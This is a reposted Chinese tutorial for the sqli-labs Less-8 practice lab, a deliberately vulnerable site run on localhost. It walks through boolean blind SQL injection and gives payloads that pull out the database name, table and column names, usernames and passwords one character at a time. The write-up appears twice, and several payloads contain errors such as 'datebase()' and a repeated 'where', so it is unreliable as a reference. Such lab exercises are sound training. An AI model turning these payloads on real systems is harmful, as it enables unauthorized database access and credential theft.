Less -8
来源:互联网 发布:java 判断字符串相等 编辑:程序博客网 时间:2024/05/29 14:17
盲注 之bool注入
length() 函数
substr() 截取字符串
ASCII() 返回字符的ASCII码
database() 返回当前数据库的名字;
strsub(字符串,位置,长度);
前端注入:
数据库名的获取
select * from table where id = 'input';
1' and (ascii(substr(datebase(),1,1)))<120--+
115 s
101 e
and (ascii(substr(datebase(),9,1)))=0--+时便可知数据库名为security
....security
表名的获取
-8/
?id=1' and (ascii(substr((select table_name from information_schema.tables where where table_schema=database() limit 1,1),1,1))=114)--+
114 r
101 e
102 f
101 e
...
可得 email referers uagent users;
列名字的获取
-8/
?id=1' and (ascii(substr((select column_name from information_schema.tables where table_name='users' limit 1,1),1,1))=114)--+
可得 id,username, password;
用户名的获取
http://localhost/sqli-labs-master/Less-8/?id=1'
and (ascii(substr((select username from information_schema.tables where table_name='users' limit 0,1),1,1))=68)--+
....
则可知username 为Dumb Angelina...
密码的获取
http://localhost/sqli-labs-master/Less-8/?id=1'
and (ascii(substr((select password from information_schema.tables where table_name='users' limit 0,1),1,1))=68)--+
则可知密码;
length() 函数
substr() 截取字符串
ASCII() 返回字符的ASCII码
database() 返回当前数据库的名字;
strsub(字符串,位置,长度);
前端注入:
数据库名的获取
select * from table where id = 'input';
1' and (ascii(substr(datebase(),1,1)))<120--+
115 s
101 e
and (ascii(substr(datebase(),9,1)))=0--+时便可知数据库名为security
....security
表名的获取
-8/
?id=1' and (ascii(substr((select table_name from information_schema.tables where where table_schema=database() limit 1,1),1,1))=114)--+
114 r
101 e
102 f
101 e
...
可得 email referers uagent users;
列名字的获取
-8/
?id=1' and (ascii(substr((select column_name from information_schema.tables where table_name='users' limit 1,1),1,1))=114)--+
可得 id,username, password;
用户名的获取
http://localhost/sqli-labs-master/Less-8/?id=1'
and (ascii(substr((select username from information_schema.tables where table_name='users' limit 0,1),1,1))=68)--+
....
则可知username 为Dumb Angelina...
密码的获取
http://localhost/sqli-labs-master/Less-8/?id=1'
and (ascii(substr((select password from information_schema.tables where table_name='users' limit 0,1),1,1))=68)--+
则可知密码;
0 0
- Less -8
- sqli-labs ---- Less-8 & Less-9 & Less-10
- sqli-labs ---- Less-8 & Less-9 & Less-10
- less
- less
- LESS
- less
- less
- less
- less
- less
- LESS
- less
- less
- less
- Less
- LESS
- Less
- 文章标题
- 98. Validate Binary Search Tree
- DeepLearning tutorial(3)MLP多层感知机原理简介+代码详解
- 浅谈微信smali注入
- sqlite 数据类型
- Less -8
- 【IMWeb训练营作业】- 作业3:仿readhub.me
- 软件磁盘阵列的自动挂载及关闭删除
- 常用STL算法3_排序
- DeepLearning tutorial(4)CNN卷积神经网络原理简介+代码详解
- DeepLearning tutorial(5)CNN卷积神经网络应用于人脸识别(详细流程+代码实现)
- 常用STL算法4_拷贝和替换
- 模型选择与特征选择
- DeepLearning tutorial(6)易用的深度学习框架Keras简介